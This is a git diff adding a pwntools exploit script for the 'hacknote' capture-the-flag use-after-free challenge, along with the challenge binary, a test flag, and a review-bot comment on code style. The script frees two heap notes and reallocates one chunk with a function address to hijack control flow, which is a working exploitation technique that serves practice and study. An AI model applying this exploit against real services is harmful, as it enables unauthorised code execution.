diff --git a/.gitignore b/.gitignore
index e74bc15..d5af811 100644
--- a/.gitignore
+++ b/.gitignore
@@ -33,7 +33,6 @@ peda*.txt
 *.dylib
 
 # Executables
-*.exe
 *.out
 *.app
 *.i*86
@@ -47,7 +46,6 @@ peda*.txt
 
 # Kernel Module Compile Results
 *.mod*
-*.cmd
 .tmp_versions/
 modules.order
 Module.symvers
diff --git a/UAF/hacknote/answer.py b/UAF/hacknote/answer.py
new file mode 100644
index 0000000..4fc248a
--- /dev/null
+++ b/UAF/hacknote/answer.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386", os = "linux", log_level = "debug")
+
+def note_add(p, size, content):
+    p.recvuntil('Your choice :')
+    p.sendline('1')
+    p.recvuntil('Note size :')
+    p.sendline(str(size))
+    p.recvuntil('Content :')
+    p.sendline(content)
+
+def note_delete(p, index):
+    p.recvuntil('Your choice :')
+    p.sendline('2')
+    p.recvuntil('Index :')
+    p.sendline(str(index))
+
+def note_print(p, index):
+    p.recvuntil('Your choice :')
+    p.sendline('3')
+    p.recvuntil('Index :')
+    p.sendline(str(index))
+
+# p = remote("hackme.inndy.tw", 7719)
+p = process('./hacknote')
+elf = ELF('./hacknote')
+gdb_command = """
+    b *0x80486ca
+    b *0x8048893
+    b *0x80488a9
+    b *0x804875c
+    """
+magic_addr = 0x08048986
+gdb.attach(p, gdb_command)
+
+note_add(p, 100, "abcdefghijklmn")
+note_add(p, 100, "abcdefghijklmn")
+note_delete(p, 0)
+note_delete(p, 1)
+note_add(p, 8, p32(magic_addr))
+note_print(p, 0)
+
+p.interactive()
\ No newline at end of file
diff --git a/UAF/hacknote/flag b/UAF/hacknote/flag
new file mode 100644
index 0000000..1a77da5
--- /dev/null
+++ b/UAF/hacknote/flag
@@ -0,0 +1 @@
+flag{test success}
diff --git a/UAF/hacknote/hacknote b/UAF/hacknote/hacknote
new file mode 100755
index 0000000..d7ce4b0
Binary files /dev/null and b/UAF/hacknote/hacknote differ
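Review bot: `gdb.attach(p, gdb_command)` near the bottom of the new answer.py runs unconditionally, so the script cannot be switched to the commented-out `remote(...)` target or run outside an interactive debugger session without editing it; gating it on pwntools' built-in command-line flags, `if args.GDB:` / `    gdb.attach(p, gdb_command)`, keeps one script usable for both local debugging and plain runs. The breakpoint addresses in `gdb_command` and `magic_addr = 0x08048986` carry no comment, and `elf = ELF('./hacknote')` is loaded but never used, so a reader cannot tell what those constants refer to or that they are tied to this particular build (presumably a non-PIE i386 binary, given the 0x0804xxxx range); a comment such as `# addresses are specific to the committed ./hacknote build; re-derive from elf.symbols if it is rebuilt` would document that. The imports `LibcSearcher`, `struct.pack` and `os, base64, math, time` are unused in this file, and the two `from ... import *` lines make it unclear which module supplies each name; dropping them makes the dependency on pwntools alone explicit.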
diff --git a/UAF/hacknote/hacknote.idb b/UAF/hacknote/hacknote.idb
new file mode 100644
index 0000000..84c5cfd
Binary files /dev/null and b/UAF/hacknote/hacknote.idb differ